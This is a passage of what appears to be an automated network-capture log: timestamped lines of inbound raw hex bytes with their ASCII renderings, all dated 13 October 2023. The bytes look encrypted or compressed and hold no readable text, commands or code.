9b f1 21 a7 a6 86 42 fd ab 92 5d c8 f1 3e 3f 25 ad 63 a1 fe e2 60 2b Data Ascii: ]_{85QF`f0 EtOa/s:mLPZx\|:)3_!(=\j C]\D_SFi_1@f+,=qaqK-o7F/96rVMNb[q*!OZqN4VB^&G1+m\|mMpWL):WS(.Ki!B]>?%c`+
2023-10-13 13:21:15 UTC	6734	IN	Data Raw: fb d5 64 fd 8c 5c 47 4a b4 e8 c0 a6 c1 d4 46 4a e4 67 9e ac 25 2e e2 ef 35 4a ae fd 04 3d fb 39 c6 6f 15 01 0a 8d 93 b2 6c e1 dd 4b 23 89 6c e0 0b 22 c2 d5 33 7a 0e 4f 57 cb d4 ee 3a 6c bc 70 9a e1 79 22 a2 4e 94 f3 75 c7 5c ea e3 e9 16 bb a3 1d ab 91 5d 2e 60 ad 04 5a 42 3b d2 77 1c e5 cc 92 46 87 2c 2c a4 31 f0 95 75 e4 6e 0d 12 cf 79 65 bd e3 52 c4 ab a5 b7 32 09 6b 06 f0 26 d9 3e 3f 71 fd 53 eb 2d b0 75 cd f0 af a6 bf af f9 bf e5 77 f9 87 89 d7 92 a4 f3 4c 8a 55 06 92 e9 e2 02 ef 0c e5 88 e4 96 87 a0 8d 8d 77 a8 57 bb 44 ac 4f 16 0c 0f 1e 0d 3f f9 3d bb 7c 18 2c 73 08 b5 e4 5d d3 87 79 84 ab 4f 7e fa 55 e6 fa 42 44 66 ec 00 43 8a 4e f9 ff 57 46 7d 49 69 58 a1 c4 08 6f 6e a7 3a 51 39 e6 5c af 56 45 15 ad fe c9 b8 08 f7 2c a9 8b 88 65 61 a5 00 eb 87 33 Data Ascii: d\GJFJg%.5J=9olK#l"3zOW:lpy"Nu\].`ZB;wF,,1unyeR2k&>?qS-uwLUwWDO?=\|,s]yO~UBDfCNWF}IiXon:Q9\VE,ea3
2023-10-13 13:21:15 UTC	6750	IN	Data Raw: 53 10 78 66 9e 3b f4 cb 31 15 7e 60 35 7d 09 0f a0 a2 f9 d4 5b 60 04 22 ae 5d a3 26 ed bd 36 80 70 38 d4 59 11 0a 5f a2 cf 8a 6f 02 d1 46 6c b2 cd 1f 2b 1b 1d 4f a8 ed 79 78 40 a4 11 8e 3a 98 0a 50 27 c6 a2 a2 a2 41 cb f1 28 7a df d1 06 25 3a b3 4b 09 e0 f5 50 79 59 aa b0 5e 25 7d d6 fa 25 3d 52 97 dc 4c 9c ed 1d 26 fc 26 b3 2d 58 00 1a 7d d4 a6 c3 bc 23 3b 21 2d 71 f2 d9 15 6e a3 c0 61 5d 4d 72 81 7b 22 dc 74 aa 52 e9 52 53 f9 5d 70 4e f6 d8 66 55 71 3d d3 dc 91 1d 24 dc 66 8b 72 43 71 96 8f 22 32 88 9f 9a a9 55 41 6d eb 1a 24 c6 42 f9 a5 f3 70 4d fe 68 6e 6f 46 4c 31 6d c2 c4 33 33 3b 1c 12 8e 2b cb 8b 6d 3c a3 6f a2 04 bd 1d 78 e2 dc b0 59 14 6a a1 c0 07 6d dc 51 55 7b 88 65 19 78 83 7e e1 de 13 51 ff 5a 71 4a 09 dd 92 8b ce 18 50 6f a0 5f a6 db d1 83 Data Ascii: Sxf;1~`5}[`"]&6p8Y_oFl+Oyx@:P'A(z%:KPyY^%}%=RL&&-X}#;!-qna]Mr{"tRRS]pNfUq=$frCq"2UAm$BpMhnoFL1m33;+m<oxYjmQU{ex~QZqJPo_
2023-10-13 13:21:15 UTC	6766	IN	Data Raw: e9 94 0d 87 52 e1 ba 17 7d 2f 4f b9 90 f2 0b 89 ab 29 6f 55 61 2c ff c3 f5 2c bc ea 1a e1 2e 88 25 69 53 a2 de 0e c9 39 7d 53 15 6f 9b cc ab cd 94 e4 de fe 09 cb 6f de 21 31 5b 95 01 6f d5 41 af 1e fa ec df 21 0d ef 6d 52 ca 56 ae 06 8d 10 09 b9 44 30 23 c9 06 c9 a8 a7 2a b1 00 c0 29 8e 16 b5 c1 5e c4 6a 91 40 e5 2f 82 af ca 4d 53 52 8d ba 00 cc c6 ec e8 30 50 05 35 70 0a 1e 8d 6b aa 5d 83 46 98 42 73 bb d9 c3 2a 6e ef be 17 f5 3c d0 ff 74 ed 24 fb cf e7 74 7c 64 c0 5b 22 1f 40 20 ba 46 1b 9b 9a 4a 46 bc d1 e1 83 64 68 20 dc 14 8c 81 0e 40 fe 0e c3 1a e6 3a 07 63 da ff 48 30 44 91 bd 44 f5 05 b8 89 aa fc 95 9b 39 14 2d d2 7d 83 7d 76 35 e6 53 a7 e7 93 1c a0 5e 0f a7 7c c9 89 de 8c fb 9d 76 7e 56 1e 56 cf 7d 9f e9 60 90 2c 20 d2 f4 c6 89 d7 ae 04 c8 e8 fe Data Ascii: R}/O)oUa,,.%iS9}Soo!1[oA!mRVD0#)^j@/MSR0P5pk]FBsn<t$t\|d["@ FJFdh @:cH0DD9-}}v5S^\|v~VV}`,
2023-10-13 13:21:15 UTC	6782	IN	Data Raw: f8 4e b4 ae 19 b1 c2 50 d3 7e f1 c0 b6 4d 77 e1 ae 7a fd a2 99 e0 a4 3b c9 28 8d 91 4f 39 73 eb c6 74 ce c6 b2 a1 16 35 1b 45 78 5e c2 2a b1 f4 c6 81 d2 4d fc dc d9 e1 a6 c9 45 5d 63 32 d7 ff 23 d4 f0 75 2c 66 73 9d 52 e1 fa 44 53 29 24 67 2f 1d 00 ee 54 64 4d f7 81 34 b4 32 a1 06 65 7f 0b e9 b5 ff ca 9a f9 74 0b 24 fe e2 62 9e a1 b3 f0 c1 37 05 98 c8 25 09 38 da 53 11 0b 12 24 22 f1 09 ee 7c 5f b3 b5 fc 48 1e 47 d0 3a 8f 7a d1 cf 76 a2 7d be 26 5d b3 ad 7f bd 73 50 fe 64 4e 0d 3d 54 86 c2 38 f4 47 9c 92 ca 00 23 05 d0 66 af 59 f1 6d fc 58 3f db 77 77 b0 23 c8 f0 f6 28 61 b0 fc e7 08 fd c6 73 d2 4e 85 e3 6c e2 5e f0 8c 21 a5 9c c5 40 91 73 0d dc d4 69 7d 95 d3 7b 71 e6 3a 75 90 a3 2f 14 57 58 fa a2 87 5b 79 e4 9e fe 75 0f 30 91 86 25 7b e0 3c b5 ac 7f 72 Data Ascii: NP~Mwz;(O9st5Ex^*ME]c2#u,fsRDS)$g/TdM42et$b7%8S$"\|_HG:zv}&]sPdN=T8G#fYmX?ww#(asNl^!@si}{q:u/WX[yu0%{<r
2023-10-13 13:21:15 UTC	6798	IN	Data Raw: c2 ad 76 f2 4d 27 df 08 44 69 be 87 27 04 d7 b0 53 dd 05 0e 30 ff 60 f2 9f 8d cb fd 01 97 b6 ab 65 c7 91 aa 56 bb dc 5f 71 85 16 f6 94 74 97 6a 7a 41 25 0b 56 b1 c5 18 60 8b 54 30 c0 82 cf 37 6c 69 da 96 c5 f6 67 56 c4 3f 8e fd 79 4a b0 77 4e 38 83 17 f1 3e 0e b6 6f a5 f8 58 ed 92 65 64 d3 90 a2 8c 14 64 73 47 2f 65 aa 69 20 fd 85 31 db af 05 4c a9 74 da f0 07 5b a8 3e 4a ea 65 50 f2 f5 5d 9c 8e e1 ee 89 79 a5 80 5e 2b 91 64 6f 00 5a ef 00 54 9b da 49 86 ec b5 27 ad c6 7e da 7a 4c 61 71 61 b7 97 96 38 bf b9 93 df 74 ea 3f d5 da d0 03 8f cd c9 8b b0 a5 a1 2d 0f de bd c1 75 68 93 4d 0a 4c 20 e8 ea 06 69 7d f2 e6 db 3e 8d f7 c6 e7 96 29 6e 43 19 66 c9 da f4 db 18 95 f8 82 ef 9c 73 5e 54 29 ba 97 5a 33 82 d4 29 41 fc ae 3a 41 a2 8d ec 01 9e 25 f0 b3 e6 f1 bd Data Ascii: vM'Di'S0`eV_qtjzA%V`T07ligV?yJwN8>oXeddsG/ei 1Lt[>JeP]y^+doZTI'~zLaqa8t?-uhML i}>)nCfs^T)Z3)A:A%
2023-10-13 13:21:15 UTC	6814	IN	Data Raw: da f9 27 6c 9b 99 f1 5f b5 fd 91 26 2f a7 e1 2b 4a b7 c2 b7 e4 a6 9f bd 50 c1 69 00 27 0c ad 16 a3 3d 74 4e 33 a5 17 61 59 78 4d 8b 63 4e 6f af b7 89 3d 85 40 66 9e 77 ae 88 3a 6e 7d b4 1d 64 f1 f7 23 e2 d2 20 db 74 24 b7 d5 9b 69 30 af 1c a3 ba fa f4 25 bb 54 f2 85 c2 e2 b3 3e b7 c3 36 87 f3 22 d7 fb f5 eb 98 f3 f5 88 20 77 fc 12 3b c7 25 2d 24 89 e2 e9 15 6c 58 2d e2 08 09 fd f2 4a d1 c9 ec 6d 4b de a7 19 3d 08 96 24 e9 4b 7b 11 32 e9 0c cc 17 de e9 6c 05 5e da be ad 61 6b 0c c4 ef 0f de 8a 32 45 88 47 71 7e da a6 cd fb 69 1f 48 99 4f 95 09 03 2a 40 0d 2b 5a 93 ca 72 ef 79 32 a4 f1 18 b8 86 d7 0b 02 63 df 01 93 b9 da d4 1f 6d 89 3e 50 97 da d4 1b b8 07 48 ef 0a c2 21 2f 1c df b0 02 35 1b ce 08 b0 d5 cc d5 53 4f 3f 28 28 0b c7 28 48 8e 71 02 99 34 5b 2c Data Ascii: 'l_&/+JPi'=tN3aYxMcNo=@fw:n}d# t$i0%T>6" w;%-$lX-JmK=$K{2l^ak2EGq~iHO*@+Zry2cm>PH!/5SO?(((Hq4[,
2023-10-13 13:21:15 UTC	6830	IN	Data Raw: f2 8c a4 b6 b3 3a bf 4b 5f e2 21 b4 da 5f 39 cf 2f cf 3b d1 a1 1c 75 dd a1 78 0a 42 0a 02 96 b4 be a5 7d 03 58 f8 8c 64 1a 33 49 e6 aa 4c cd a6 66 95 57 ec 12 56 c0 bf 58 9c 19 92 27 62 44 c0 11 b9 8b 31 4a 29 37 59 5e f7 11 e3 02 ba 98 44 c6 cc 0f 4d 75 50 8e c2 b4 2c 5d 81 1c 50 98 1f a7 d9 ee 44 f1 6c 31 e6 cc 6b b4 b2 62 a4 54 2a 0f 39 09 79 66 d4 d3 c9 d7 c4 53 e7 40 b0 ee 04 46 7d 64 1a d5 84 60 d2 89 8d 5f 6c b6 9b 48 7f be 0e 25 38 aa e5 5c f3 ad cf 27 ab fb 1f 6e 5b e3 67 ba 6c 6b 31 6f c6 66 8e 26 64 68 8e 61 1b 84 61 81 f8 00 1b ad 1d 0d ca 40 0c 83 19 40 c5 df 5d 62 00 e3 1b 5d fb b2 72 aa 87 ce 94 84 d1 b3 71 81 92 bd 68 84 a4 44 9d 43 59 58 ae 83 da f9 5a 33 af d2 34 6d d8 d1 ef 1e e7 5d 3f 6e e2 e8 0d 85 d3 1f 7c d7 35 a8 ba 86 0b c4 2e 4a Data Ascii: :K_!_9/;uxB}Xd3ILfWVX'bD1J)7Y^DMuP,]PDl1kbT*9yfS@F}d`_lH%8\'n[glk1of&dhaa@@]b]rqhDCYXZ34m]?n\|5.J
2023-10-13 13:21:15 UTC	6846	IN	Data Raw: 71 5c a6 05 72 27 f6 36 de 19 8d 7c 39 15 82 c2 63 7e 16 c7 fa 08 57 c4 9e 27 04 51 ba 2e fb 91 80 9f 0a ca c3 c7 a9 4f a7 06 2e 42 0c b8 2d c8 27 91 bf 42 96 ad 3e a2 47 f6 58 80 75 45 bb d0 fb 59 86 55 f1 b7 04 cb 66 e7 2c 8f 2c e7 90 31 2f ac 97 b4 76 99 a0 e8 36 23 04 c0 25 ec 9f a4 fc 6e 27 33 b6 61 15 62 ba a2 6d 71 3f ed 39 35 49 d8 b5 72 0d 8b 9b 18 70 47 8f 0b 40 a3 9f d5 e8 5f 55 ec 1c f7 3e e3 dc 19 f4 d0 7b bc f9 94 68 8f 8c b6 a5 e3 26 54 75 e8 e5 10 6b a4 73 46 97 34 60 df 72 4a 4f c4 21 34 60 74 f5 f9 6e ec f9 5e d1 aa 22 eb 77 54 42 9b 90 1d df d3 56 e2 4a f0 46 c1 14 53 06 08 fd f0 c4 3a db 94 60 5c 2f 61 8c 5d 05 ca d4 a5 78 5f 68 0f fe 6e 0c 6f 11 30 1b 81 f3 e5 6e a9 f9 3a cc 2b 16 15 79 4d f6 b9 7a c5 e4 3f 1f b0 74 8d 7b d5 cf 54 04 Data Ascii: q\r'6\|9c~W'Q.O.B-'B>GXuEYUf,,1/v6#%n'3abmq?95IrpG@_U>{h&TuksF4`rJO!4`tn^"wTBVJFS:`\/a]x_hno0n:+yMz?t{T
2023-10-13 13:21:15 UTC	6862	IN	Data Raw: 75 2b 5a 6a 08 73 6e b0 da fa 11 ac a3 11 1e 1b 35 c9 de 27 b3 58 51 72 41 b8 4f df af df 84 c5 b2 f6 0c 71 17 3e ea e9 dd 73 61 84 cd 29 5d fe f6 14 77 eb 88 29 d9 36 88 a0 a1 42 24 55 00 78 0d c4 b3 9b 69 d8 62 fe b4 01 ae ba d2 81 fb 6b 95 39 ba 90 00 da 14 83 16 de 26 e7 ea 61 7a be 18 c6 23 c4 0b 67 e3 a9 db 1e 8d 01 68 d6 cb 0c 10 ae d5 fe f5 b2 57 8c 03 55 15 e0 e2 9d 56 47 46 f2 4e 41 13 2e 0f af 6e ac 4f 7b a9 a4 49 4b f2 39 03 8c 63 26 13 a2 9e fa 75 96 05 aa 7c 1c ee 56 24 a0 b4 76 b6 9e 8c d8 eb 22 79 23 99 de 4b 08 95 43 70 67 d3 85 2e e4 a0 d8 aa 85 67 dc d1 ad b8 0f a2 1a 3d 77 b0 f3 db cc 4f 5c 27 fa 2e cc 7b ae 4a 4c da ca 52 54 3f b7 c8 63 5d f0 aa 7b f9 c1 e0 92 aa cf e1 71 11 8f 19 d4 92 ee 55 bf 5a 43 d9 60 89 69 81 b3 99 f2 ad 94 16 Data Ascii: u+Zjsn5'XQrAOq>sa)]w)6B$Uxibk9&az#ghWUVGFNA.nO{IK9c&u\|V$v"y#KCpg.g=wO\'.{JLRT?c]{qUZC`i
2023-10-13 13:21:15 UTC	6878	IN	Data Raw: e9 20 58 06 5a ea f6 9e 2b f4 e7 0a 08 cb a6 ca b1 2e 59 59 45 33 87 40 77 0b 24 28 95 ac c2 04 2c 78 be 3e 45 c5 50 30 5f 02 77 d2 a5 23 6b 62 f3 58 5a 80 f3 87 20 a3 bf ae f8 da 24 a1 8d 8e 20 5a 1a 45 7d f0 33 c3 1f ba 1f 0e e8 ad fe 30 00 83 6c 99 5b 79 5b b1 13 ff 0b 0a b1 70 35 0c 01 04 c0 06 d2 79 60 e4 c8 bc b6 a3 4c e9 e7 ba e6 cd 27 47 bd 2c be 97 1b 61 8a d1 53 fb 1e fb 06 c8 50 73 56 36 bc 67 c7 2b 45 be 3d d0 5a df 10 77 45 cb db 5e 7a 6a 22 e9 ca ac 73 4b c9 00 ba ec 34 55 ff d3 4d 4d 50 d7 9a 76 0f 4b 50 f7 8b 3d 62 d8 ef 43 5d ee a9 ef 06 46 a2 86 50 61 b2 a6 33 32 55 f5 56 43 02 55 93 4c 55 68 15 19 cd 37 3b 5e 3c 8f c7 36 ca 9a 9b e1 27 49 91 77 fc c2 ea 68 a5 1a 14 6a 8c 3a 70 de 5c fc 75 60 db 75 b3 ed 99 6c 68 d9 c0 51 25 e4 66 85 e0 Data Ascii: XZ+.YYE3@w$(,x>EP0_w#kbXZ $ ZE}30l[y[p5y`L'G,aSPsV6g+E=ZwE^zj"sK4UMMPvKP=bC]FPa32UVCULUh7;^<6'Iwhj:p\u`ulhQ%f
2023-10-13 13:21:15 UTC	6894	IN	Data Raw: cd 3a 37 ab cf 56 5a 96 59 2a 97 95 5d f0 92 e6 b1 8d a2 8e c8 a6 0d 71 fc f0 ca 57 fe 9a 2c 3c 16 89 bd 43 55 6f 30 6d ca 5d 75 ba c2 d0 72 eb d9 92 07 c4 09 b8 aa 53 d8 6e de 55 65 a9 9e 49 32 c3 20 e7 19 f7 4c 9b 0c 83 d3 61 8d 39 34 30 a2 17 6d 60 3b 2a 0c ad 45 70 27 82 0a 2c 7d 13 1c 57 71 1b 30 f4 6a 84 43 76 b8 37 97 0f 9e a9 a7 7d b5 60 89 36 8d ac dd f2 39 bc 95 b9 97 35 7b 8a 5a 7e d6 1a 94 3e 3f 61 f5 09 09 8b 87 a6 cb 14 ac 3c d6 3f f7 34 6c 07 51 cc 2f 53 9c f9 8e 72 1d 7e 4c de 24 d2 3d 97 e3 e9 49 46 33 78 df dc 09 1d 3e c9 bb 76 d6 8e b6 b5 e4 2a 15 21 d4 2e be 16 78 52 46 d1 44 07 a7 cd 16 93 81 11 48 90 1d 8a d5 12 69 b7 0d ec 6c 25 62 71 fd d8 6f dc b9 4d 67 3e cf 08 9e 12 60 81 8b e1 7f d6 e0 d9 11 ca bd b7 39 bd 40 cc 1d a9 1e 44 b1 Data Ascii: :7VZY]qW,<CUo0m]urSnUeI2 La940m`;Ep',}Wq0jCv7}`695{Z~>?a<?4lQ/Sr~L$=IF3x>v*!.xRFDHil%bqoMg>`9@D
2023-10-13 13:21:15 UTC	6910	IN	Data Raw: 10 1c 2c 9c 36 69 d0 f7 98 be cf 60 2e c8 6e 9d 93 09 89 24 88 30 9e 3c d7 fb c8 34 4e 92 40 62 a4 39 c6 ef 74 9d bd bc 47 58 fc c8 2b 65 fd 2b 66 5c 2a 95 b4 44 ab 29 96 49 64 ec 5f f5 10 db f7 16 3a e9 15 7d 1f de 96 9b 92 ca 77 d3 2c b2 71 9d 84 65 69 2a ef 4c 5b c1 12 b8 68 d9 e7 25 84 81 0e ec a7 0c c3 cc 72 d3 ce 79 63 26 46 dc 98 9e 7c 2a 30 1d b2 e5 c9 a3 71 07 f3 b7 1a 1c 8b 62 85 ba fb 1e d1 ab 1a 69 53 cb 5a 82 78 8d 3a 1e 75 bb 2a f9 0e b1 7e da 09 93 ca 4c c5 ab c0 4f 27 c0 7c 8a 40 e0 e2 c8 e0 03 5d 00 0d 2f 08 aa 61 f0 79 17 e9 df e8 c5 c4 f7 7e f1 30 b0 de 28 88 db 7c 5f 64 dc e1 e3 dc 67 57 eb 37 73 9a 34 13 b2 86 6f 00 7b 96 8c d8 60 7c 23 3a 1d c8 f5 e9 0b 43 e0 08 80 1c b8 f4 b5 61 75 95 d9 65 bb b8 68 d7 fd 82 f3 8d 73 3c f4 a2 3c 78 Data Ascii: ,6i`.n$0<4N@b9tGX+e+f\D)Id_:}w,qeiL[h%ryc&F\|0qbiSZx:u~LO'\|@]/ay~0(\|_dgW7s4o{`\|#:Cauehs<<x
2023-10-13 13:21:15 UTC	6926	IN	Data Raw: 22 d4 51 2f 07 ed ec 51 73 b2 f3 2b c3 28 18 dd 44 3e ea 3a bd a5 e2 ab 51 42 3e b9 86 ac 0c 58 ef 3e a6 a5 be 89 37 c5 a7 06 ba 3e 25 1f ce 4e 7d 40 ec 5e 88 a6 e3 d2 d1 50 1a 66 bc 18 d8 e6 0d bc 28 1f c8 39 c6 16 7a eb d6 d6 b5 be 48 01 43 62 cc 5f 6e 32 49 8e ea 05 d5 6d 6f ba c0 66 22 d4 a5 cb 1e ab 03 f7 77 f9 66 96 d5 ec db 75 d0 8f c1 df 46 dd 32 0c 9d 03 8a 15 ef f5 f7 c7 ea 2c 18 90 1c 53 a9 bb 65 1c 37 ff 75 37 6b 96 78 44 3e f9 a4 3f ec d7 08 d5 28 72 6c 61 62 8a 96 89 3e 2e 6f a7 3e a5 97 1c 85 64 4c 46 2c 97 83 34 05 e8 0c 67 cb 5b a7 b4 5a f3 b4 22 ad 77 2d 02 73 12 ce e6 68 d4 12 8b 6e 3c 51 c6 f0 00 d8 83 27 43 a3 09 58 83 da f2 d8 f9 1e fa d9 d2 39 c8 a0 80 28 c1 86 df 51 48 53 72 57 ba 03 c6 47 80 f4 98 e9 fd a7 9b c1 5b b3 d8 ac eb cb Data Ascii: "Q/Qs+(D>:QB>X>7>%N}@^Pf(9zHCb_n2Imof"wfuF2,Se7u7kxD>?(rlab>.o>dLF,4g[Z"w-shn<Q'CX9(QHSrWG[
2023-10-13 13:21:15 UTC	6942	IN	Data Raw: 1b 5c ef 58 e0 83 c1 0d 04 41 62 e6 88 0a 8b 70 73 a5 26 65 99 c9 9c cd 8e d0 8f 2b b2 fb d5 1e a2 5f 1f 3e 4a b3 cd e7 3b 51 35 d9 b7 32 0f c1 68 b8 95 12 4f 5d cc 92 4b a4 01 17 4d ad 3b 53 ab 1f cf 7f eb 0b 0c fb 6c 7c 96 77 f0 57 88 1b 96 e2 05 e1 f2 70 bb b7 c1 60 9e 22 fd ed 35 55 6b eb d6 f3 8f fb e4 89 9a d5 21 70 ee f5 33 4c 71 67 88 00 2e 2d 8f 52 90 65 5f 08 e3 c8 ec be 11 5c 22 7f 1a 57 f0 96 0d e2 04 5b dd d6 7c 40 56 60 96 13 3c f4 21 48 b7 58 cb 21 e9 16 b5 ff 5a cb f5 05 bd 5b d5 d2 c3 7b 1a 33 24 c2 bd e9 54 15 02 7b 32 15 bb 6a d8 57 bf a5 6d dd 14 18 2e ea 9d bc dc 82 30 db b5 ed 2c 2a d1 13 96 b0 da 5e e6 08 73 3a 4b 09 be 19 be dd 6d 8b 5e b9 90 26 fa 0d 3e 01 46 f9 a3 93 4d ef 1d 65 90 ac 8d da 36 46 11 dc 4f 8c 4a 4d 1c d5 75 96 75 Data Ascii: \XAbps&e+_>J;Q52hO]KM;Sl\|wWp`"5Uk!p3Lqg.-Re_\"W[\|@V`<!HX!Z[{3$T{2jWm.0,*^s:Km^&>FMe6FOJMuu
2023-10-13 13:21:15 UTC	6958	IN	Data Raw: 9e d2 4b 53 6a 8c 5f 0e b5 b6 41 59 a2 1a be e3 4c 81 e4 25 6d f8 da f2 84 75 e6 81 45 df d3 b3 e8 fb 09 35 04 7a 45 40 b0 07 0c b6 83 09 36 2b 53 2d 09 bc 5f 95 05 7f 44 2e a1 c4 71 76 93 3c a1 65 ee 2c 7d b9 55 e8 44 b8 f7 6e 90 6e c0 6b c5 bd 67 e7 f0 f9 0e 78 3d 9e 00 cd 5b 77 d2 1d 9c ac 49 ae 2e 27 da 16 48 86 c1 f3 d1 1f 91 e5 21 30 00 b0 dc 0c 37 96 8d 49 b0 ce d0 3d ad 73 60 9f 02 76 cd 9c 47 98 3e 5a fd 77 ea cc 3b 8d b1 a2 f0 36 9e 8e 5d e6 de 26 90 3e 0a a4 3f 74 f5 84 d6 da 31 06 3f 72 54 9e c9 3d c6 44 c0 c7 ee 33 3e 30 09 12 2f a5 2b 45 55 00 83 d5 83 16 0b c9 76 f6 14 d0 66 07 10 54 0c 7b 49 ce 44 78 02 eb c1 87 df bb 03 62 c1 83 50 aa 31 9d 50 63 5b 93 2b f4 03 79 c6 15 25 91 6d 72 b6 ee 19 9f f1 6f 1c a4 eb cc 70 c1 0e 36 62 f1 57 d0 d7 Data Ascii: KSj_AYL%muE5zE@6+S-_D.qv<e,}UDnnkgx=[wI.'H!07I=s`vG>Zw;6]&>?t1?rT=D3>0/+EUvfT{IDxbP1Pc[+y%mrop6bW
2023-10-13 13:21:15 UTC	6974	IN	Data Raw: 1d 30 e3 04 65 3a e1 3f b4 08 33 ed 91 35 e3 5b 5b 1d 0b b8 b4 98 e9 cb 62 10 bc 0c a2 38 8c 86 b7 c6 15 09 0b e3 eb 67 fb 3f d5 e6 74 90 ac 6a cf e4 a2 e5 52 42 0d 35 d5 04 26 01 26 13 68 be c3 4c 89 5a 25 a6 b3 d2 dc 58 c4 ba 8d db c1 0d 07 4a eb 47 e0 da 4b 73 83 a3 a5 9d 9d 9b 29 51 1a 21 4b 84 92 f5 e4 3e 6a 0a 52 cc 11 0c 52 85 41 da c4 da f7 e9 b1 e5 f9 12 27 06 25 08 fa 16 65 8c 26 19 ed 30 ba ce 13 a1 3d 66 ef 3c 57 b9 51 82 b6 a8 d1 60 e3 12 79 99 19 89 43 c3 dd cf c4 47 0f 59 1c 1f d2 1a 9f 0d ff c8 e8 f1 0f 1b c2 3b e4 99 7b 8a fb 7a 68 d5 4e 30 43 7d f8 00 fe 01 26 07 56 47 6b d3 63 42 7e c8 34 58 fe cd f7 91 41 c7 c5 e6 c9 49 fe 90 8a 82 ac 6b bf 51 57 f0 f3 0b e4 cd ca 5d 92 97 0a bd 21 ec c1 57 e9 6d f9 fe df 4d ac 1a b3 56 2d 58 e4 7b ae Data Ascii: 0e:?35[[b8g?tjRB5&&hLZ%XJGKs)Q!K>jRRA'%e&0=f<WQ`yCGY;{zhN0C}&VGkcB~4XAIkQW]!WmMV-X{
2023-10-13 13:21:15 UTC	6990	IN	Data Raw: 92 95 76 94 b0 ff 07 c9 c6 5d dc bb f2 97 3b 43 09 8a 86 90 28 01 d1 56 bd c3 e4 eb 3c 4a 61 be 20 5d cc 60 57 33 3a 9f e3 e9 a9 4b 4e 7b a7 61 d5 45 46 3f 93 cb 4f 44 6d 14 52 6b 36 49 8e 87 fb 3e 79 2c 68 9f c0 50 7e d4 14 b7 a6 47 23 1e cf e7 0d 3f 8a 5c 59 f1 16 72 11 6d cb f5 f3 72 e6 3d 40 ca 8b 7e ba 67 a1 8c 2f c7 f4 65 1a 14 0a 3c 8b c5 64 f6 da de 5a 52 39 3a 08 da d3 46 a9 58 60 6f ba ee 67 79 c1 99 e5 5f 60 93 09 8d cc 50 c2 44 e7 c9 05 9f 17 a0 e1 21 66 00 29 30 66 f1 60 ce 71 d9 22 af db 42 fd a0 0a e0 ff 91 61 f2 b7 d0 9a f3 82 8d 8d 78 2f 48 6a 7b 1a d2 e5 aa fe 5d 0c f7 27 78 1d e5 26 db 21 ec d7 f1 94 e5 4d ba d5 a9 10 5e 7e 43 bd ef dc 67 43 32 2f 78 cc 79 7b 86 58 f0 1f 60 1d 00 cd f8 3f d7 da 16 18 ce 73 ba ba 04 42 b7 3c 24 23 c5 2e Data Ascii: v];C(V<Ja ]`W3:KN{aEF?ODmRk6I>y,hP~G#?\Yrmr=@~g/e<dZR9:FX`ogy_`PD!f)0f`q"Bax/Hj{]'x&!M^~CgC2/xy{X`?sB<$#.
2023-10-13 13:21:15 UTC	7006	IN	Data Raw: 9c e5 73 ee d6 7e 47 53 60 3c 1a fd fe 87 0c ea cf 7b 8a 03 81 52 87 85 62 6c e1 c3 ec 60 67 32 e0 3c e8 4a 20 2b 25 fd d9 37 6a 6b 06 83 57 7c 87 b0 7f aa 6c 6f e7 bb 73 90 89 b6 39 9a 60 2b 4c 80 6e 0e 92 8e e9 db 3c ff de 5b 6a f8 72 8d 68 60 02 b7 41 0c a4 ad 7b 90 a4 90 19 56 c2 d4 08 3f be a3 cf 95 de ef 53 d7 e2 d3 2d b1 cb 36 f5 f6 9d c4 5c 04 32 8d 82 78 30 8d 77 ce a0 05 b4 6f 94 d2 1f a0 ee 01 6b 3b 19 5e e3 98 92 8c ff d6 ab 39 60 e2 13 1c 2e ca f5 3d 71 eb 2d 25 db 0a c1 ef 67 61 69 9d 62 cb c7 a6 bc 31 d2 5c 12 3e b0 d3 ad e4 90 d1 52 f7 e6 b7 42 b4 9f 51 09 19 85 00 9c c9 f1 da 21 1d b0 ee f7 3c ee 45 db 1d 1e 8b 64 e4 8f 98 81 df 02 79 f3 0e bc 8a 49 7c ac cf 21 38 77 72 5b 3f c6 95 11 8a 50 e8 e2 37 d7 50 ac 58 3c 4e a5 3a b8 85 3b 44 91 Data Ascii: s~GS`<{Rbl`g2<J +%7jkW\|los9`+Ln<[jrh`A{V?S-6\2x0wok;^9`.=q-%gaib1\>RBQ!<EdyI\|!8wr[?P7PX<N:;D
2023-10-13 13:21:15 UTC	7022	IN	Data Raw: 92 6a 3e c6 72 8e 27 b0 39 5b f5 ba 6a 13 ab 46 14 b8 4a 07 da 8d ce 71 d9 83 1e 8a 70 3a c3 df 12 9d ee 08 48 4d 92 ce 56 6b ad 03 65 95 ca 11 06 15 45 8a 93 37 75 db 67 ee b0 87 e1 1c 44 26 12 56 52 d2 7d 57 ce 0c 12 7c 2d e8 7a 6d d5 4c 5e bf e2 45 7f dc 4a 04 d0 c8 2c 59 75 5e 57 e4 bc 5c 1c 3b c8 9b 00 02 c1 5a 9b c0 ca 5f 8a 6e 71 bd a2 fe 9c db e1 55 59 1e 7f bb 71 a6 77 f1 94 96 a0 38 40 7f ae f6 ee 55 fc fa 54 89 43 21 61 4b 53 f3 72 5d 79 b6 db 7c fb ad de 92 03 0c a0 84 14 7c 9f 2b 69 16 56 d7 f6 a8 88 13 5d a1 83 d7 e3 07 45 16 7c 86 7c 29 51 ed bd 16 36 00 80 e2 af e0 03 00 8a a8 82 f3 6f 60 5c 57 21 3f ae b8 b6 6b 5b 1a 2f 88 04 99 d3 d8 7e 19 8a f3 b5 35 94 e9 91 c2 f1 cc 10 21 4f 82 8b c6 71 92 8c 86 85 1d 15 08 1d ca 41 c7 61 f8 f9 98 4d Data Ascii: j>r'9[jFJqp:HMVkeE7ugD&VR}W\|-zmL^EJ,Yu^W\;Z_nqUYqw8@UTC!aKSr]y\|\|+iV]E\|\|)Q6o`\W!?k[/~5!OqAaM
